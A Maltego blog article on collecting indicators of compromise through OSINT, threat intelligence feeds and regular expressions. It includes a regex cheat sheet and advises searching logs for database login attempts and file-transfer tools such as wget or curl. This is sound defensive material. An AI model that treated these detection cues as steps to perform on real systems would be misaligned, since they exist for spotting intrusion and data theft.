Register for our upcoming webinar with the Maltego CEO and CTO! How Maltego Empowers Law Enforcement Across Everchanging OSINT Landscape with Strategic Acquisitions of PublicSonar and Social Network Harvester on Tuesday, April 30, 2024 at 15:00 CET. Register now! close
05 Jul 2023

Advanced IOCs Collection with OSINT and Threat Intelligence Feeds

Mathieu Gaucheler

Moving from Vulnerability to Vigilance πŸ”—︎

Organizations constantly wage battles against malicious actors who seek to exploit vulnerabilities and infiltrate their digital defenses at any given time. As attacks grow in complexity, it’s imperative to keep your guard up against potential threats.

Fortunately, there are more and more methods for gathering information about attacks and attackers. By utilizing open source information (OSIF) and threat intelligence feeds, you can incorporate cyber threat intelligence into your defense strategies. This allows you to identify specific indicators of compromise (IOCs) within systems during incident response and comprehension of the targets.

In this article, we will cover the following topics:

  1. The use of IOCs in open source intelligence (OSINT) investigations
  2. Reliable sources for tracking IOCs
  3. Tips on using regular expression (regex) to identify patterns indicating a threat actor
  4. The role of threat intelligence feeds in keeping your teams informed about new threats


Understand the Scope and Impact of an Attack with IOCs πŸ”—︎

IOCs are artifacts or clues left behind after a cyberattack that you can observe on your system to determine if your system has been compromised. IOCs come in different forms, such as IP addresses, file hashes, domain names, URLs, and more.

Examples of IOCs

A typical application of Indicators of Compromise (IOCs) during incident response arises following a cyberattack. By parsing through logs and extracting IOCs, you can reconstruct the incident’s sequence of events, solving the puzzle of what happened.

IOCs help track threat actors because some can be linked to previous attacks or campaigns. Suppose a particular attack or campaign has already been attributed to a specific threat actor. In that case, it is possible that the same threat actor might be responsible for the IOCs you’re investigating.

IOCs are Valuable for OSINT Investigations πŸ”—︎

IOCs can be valuable for OSINT investigations as they provide specific clues related to malicious activities. They can lead us to more contextual information which helps us gain a deeper understanding of potential threats.

Incorporating IOCs into OSINT analysis can therefore enrich your data, improve threat detection, contextualize threats, and enable proactive defense.

How IOCs fit into OSINT investigations

If you have observed specific IOCs on your system and initiated the incident response process, you might want to delve deeper into a particular IOC to understand who is targeting you. This is essentially a part of Cyber Threat Intelligence (CTI).

Identify Traces of Threat Actors from Attack Associations and Shareable IOCs πŸ”—︎

When you’re trying to identify the culprits behind cyberattacks, one of the methods you can apply is searching for IOCs that have been connected to previous incidents. However, you also want to keep in mind how closely the IOCs are linked to past incidents as not all connections are equally strong or reliable.

Example:

IP addresses used during the same timeframe are a strong indicator that two attacks were carried out by the same threat actorβ€”unless the IP address belongs to a Tor exit node or to a content delivery network (CDN). In those cases, it could be merely coincidental.

Likewise, if two different instances of malware download a payload from a widely accessible website like Dropbox or Discord, it’s highly unlikely that these attacks are associated.


IOCs are primarily reactive in nature: You first notice something suspicious, and then search for IOCs to understand what has happened to your system. However, they can also be employed proactively to generate cyber threat intelligence.

Example:

As we read through this report by Talos, we can take note of various IOCs to study them later to get actionable intelligence. One simple yet effective step to take is to block the IP addresses mentioned in this article.


Another important point to consider is that threat actors often deploy infrastructure that can be shared across various devices to carry out an attack. The identifiers of this infrastructure later become IOCs. In order to track threat actors, you need to look into these types of IOCs.

Example:

A less effective indicator to track threat actors is a hash, as it is used to identify one file. Any threat actor can easily generate multiple variations of the same malware with slight changes, resulting in entirely different hashes (especially when using hashing algorithms like MD5, SHA256, or SHA1).

On the other hand, indicators like a domain, a domain pattern, or an SSL configuration are much more valuable. They require more effort for threat actors to create, so they are more likely to be reused. By identifying and monitoring these indicators, you have a better chance of discovering new components, such as related malware or infrastructure, that are associated with the threat actors.


Attribute IOCs to Threat Actors through Malware and Infrastructure πŸ”—︎

It’s critical to keep in mind that attributing cyberattacks to specific threat actors is a difficult task and rarely achieves 100% accuracy.

There are various reasons for this, including the reuse of infrastructure or software by different actors, the potential for shared members among threat groups, and the deliberate use of false flags to mislead investigators. Altogether, they render the attribution process a very imprecise and flawed science.

However, looking beyond attribution, the study of IOCs left behind can still provide us with valuable insights into similar malware and the infrastructure employed by threat actors:

  • If we come across malware on our infrastructure, we can examine its communication patterns by analyzing data from well-known sandbox websites like JoeSandbox or VirusTotal.
  • If the malware is communicating with a specific IP address, we can gather information about the behavior of that IP address by consulting providers like GreyNoise, or we can refer back to VirusTotal or OTX AlienVault.
  • If the identified IP address has been used to download other malware, we can further investigate its presence and activity within our infrastructure.

Use Public Sources to Keep Track of IOCs πŸ”—︎

In addition to keeping a close eye on your system for IOCs, you can tap into open-source data sources to enhance your IOCs collection. These sources include public repositories, online forums, and social media platforms, among others.

Public Sources for Keeping Track of IOCs

Here are some of our recommendations:

Another idea is checking specialized websites, such as Talos Intelligence. While these websites are not threat intelligence feeds, you can still obtain the analysis of a particular threat actor or malware from their research.

There are also communities where IOCs are shared, such as MISP or OTX AlienVault. While these communities may not strictly fall under the umbrella of open source intelligence (OSINT), they can still provide valuable IOCs for your collection.

Online forums can also be a potential source of IOCs, although to a lesser extent. It is rare for a threat actor to post a VirusTotal link to their malware, which would include the hash of the malware in the link. This is considered a bad practice among threat actors and is therefore not commonly seen.

Use Regex to Analyze Unstructured Data and Spot Patterns πŸ”—︎

Regular expressions (regex) may require more hands-on work, but it proves to be particularly useful in the context of IOCs and OSINT.

A regex is a string of characters that enables you to define a specific pattern. This allows you to search for and/or replace occurrences of this pattern within a given text. For example, with a simple regex, you can extract a list of IP addresses mentioned in a random log file, regardless of its length.

Regexes have the following advantages:

  • Efficiency: If you were to run a simple regex on the entire Bible, which comprises approximately 31,000 lines (considered relatively small compared to some log files), the results would be instantaneous.
  • Wide adoption: Regex has been around since the 1950s. There is extensive documentation, a variety of development tools, and a supportive community to help answer any questions. Also, many tools and platforms support the use of regex, enabling you to apply your knowledge in various contexts.
  • Easy to learn, hard to master: Basic regex searches, such as looking for any IP address within a given netblock, can be learned in about an hour. You can go much further and do some very complex and specific searches depending on your needs. This, however, requires more time and patience.
  • IOCs validation: Regex searches are like detectives who check whether the right pieces fit together. IOCs have specific formats and patterns, just like fingerprints. You can use regex searches to validate IOCs and see if they match the expected patterns. This can help maintain the accuracy of collected indicators, reduce errors in threat detection, and ensure you don’t miss potential threats or raise false alarms.

Key Considerations for Using Regex πŸ”—︎

Regexes can be quite complex, so it’s wise to test them before running them on large files. Websites like regex101 can help you test your regex with sample text to ensure it works as expected.

When conducting a regex search, it’s best to start with a broader search pattern and then refine it gradually to not miss any important information.

Example:

Before May 3rd, 2023, the string “malware.zip” was most likely considered a filename because, at that time, “.zip” was not a valid top-level domain (TLD). However, the issue arises when “malware.zip” can technically be a correct domain if your regex does not account for valid TLDs. This means that a generic regex for domains would mistakenly identify “malware.zip” as a domain, even though it was a filename, resulting in a false positive.

To avoid this, a skilled analyst would design a regex that considers only valid TLDs when detecting domains. This is because, as of May 3rd, 2023, Google started selling domain names using the “.zip” TLD, which means that any domains using this TLD would be missing from our results if our regex was not updated accordingly.


This example illustrates just one of the many situations where you have to choose between using:

  • A more generic regex, which identifies more results but may include false positives.
  • A more restrictive regex that minimizes the number of false positives. However, in doing so, it may miss some valid results.

It is generally easier to identify something in your results that shouldn’t be there, rather than noticing something that should be there but is missing.

There are two things that could be particularly interesting to look for when searching through log files:

  • Login attempts into databases or other critical tools on the machine (e.g., “mysql -u”)
  • Tools that could potentially be used for file download or upload purposes (e.g., wget or curl).

If you would like to experiment with some regex patterns, take a look at our regex cheat sheet for automatically extracting data from reports:

CVEs

CVE-\d{4}-\d*

Common hashes (MD5, SHA1 and SHA256)

[A-Fa-f0-9]{64}|[a-fA-F0-9]{40}|[a-fA-F0-9]{32}

URL even when defanged (ex: hxxps://google[.]com)

(?:h..ps?|f.p)://(?:www(?:.|[.])|(?!www))[a-zA-Z0-9]+a-zA-Z0-9[^\s]{2,}|www(?:.|[.])[a-zA-Z0-9]+a-zA-Z0-9[^\s]{2,}|https?://(?:www(?:.|[.])|(?!www))[a-zA-Z0-9]+(?:.|[.])[^\s]{2,}|www(?:.|[.])[a-zA-Z0-9]+(?:.|[.])[^\s]{2,}

IPv4 even when defanged (ex: 8[.]8[.]8[.]8)

\b[\d]{1,3}[?.]?[\d]{1,3}[?.]?[\d]{1,3}[?.]?[\d]{1,3}(:\d+)?\b

IPv6

[0-9a-fA-F]{1,4}(?::[0-9a-fA-F]{1,4}){7}|(?:(?:[0-9A-Fa-f]{1,4}(?::[0-9A-Fa-f]{1,4}){0,5})?)::(?:(?:[0-9A-Fa-f]{1,4}(?::[0-9A-Fa-f]{1,4}){0,5})?)

BTC address

(?:[13]|bc1)[a-zA-HJ-NP-Z0-9]{26,62}


Threat Intelligence Feeds Put IOCs into Context πŸ”—︎

Regex searches have a limitation in that they do not consider the surrounding context and focus solely on predefined patterns and structures. However, this limitation does not apply to threat intelligence feeds.

Intelligence does not equal to a collection of unorganized IOCs. These IOCs should have associated context and answer questions like:

  • When were they observed?
  • Who is the threat actor they are linked to?
  • What malware are they associated with?

This doesn’t mean that all the information is always available, but threat intelligence feeds provide as much contextual information about IOCs as possibly available.

We can think of it as a large encyclopedia that analysts can turn to when they’re trying to make sense of unusual discoveries in their systems.

Therefore, threat intelligence feeds are invaluable for threat analysts.

Here are a few examples of threat intelligence feeds with diverse sets of data sources commonly used in the industry:

One thing worth mentioning is that although they are useful for detecting and responding to security incidents, threat intelligence feeds are a tool that makes the analyst’s work easier, but they do not aim to serve as an automated solution such as Endpoint Detection and Response (EDR) platforms.

In any case, the data provided by threat intelligence feeds are structured and designed to be easily queried, meaning that the information obtained is already organized and tailored for ingestion.

Advancing Your Security Measures to a Proactive Level πŸ”—︎

To sum up, there are reliable methods for collecting and comprehending IOCs, such as:

  1. Open source intelligence (OSINT)
  2. Threat intelligence feeds
  3. Regular expressions (regex)

When used consistently and properly, these resources will help you stay ahead of adversaries and maintain a proactive security stance.

If you’re interested in exploring similar topics, check out our article on the Top 13 Threat Intelligence Providers and watch the recorded webinar where our experts explore the mapping of advanced APTs’ threat landscape using Maltego and RiskIQ PassiveTotal.

Stay connected with us on Twitter and LinkedIn, and don’t forget to subscribe to our newsletter for regular updates.

Happy investigating!

About the Author πŸ”—︎

Mathieu Gaucheler

Mathieu Gaucheler Mathieu Gaucheler is a subject matter expert at Maltego. His responsibilities include research-driven content development for blog posts, webinars, and talks. He started working in cybersecurity in Barcelona, focusing on malware analysis and sandbox development. He has previously presented his research at BotConf and RSA APJ.

By clicking on "Subscribe", you agree to the processing of the data you entered and you allow us to contact you for the purpose selected in the form. For further information, see our Data Privacy Policy.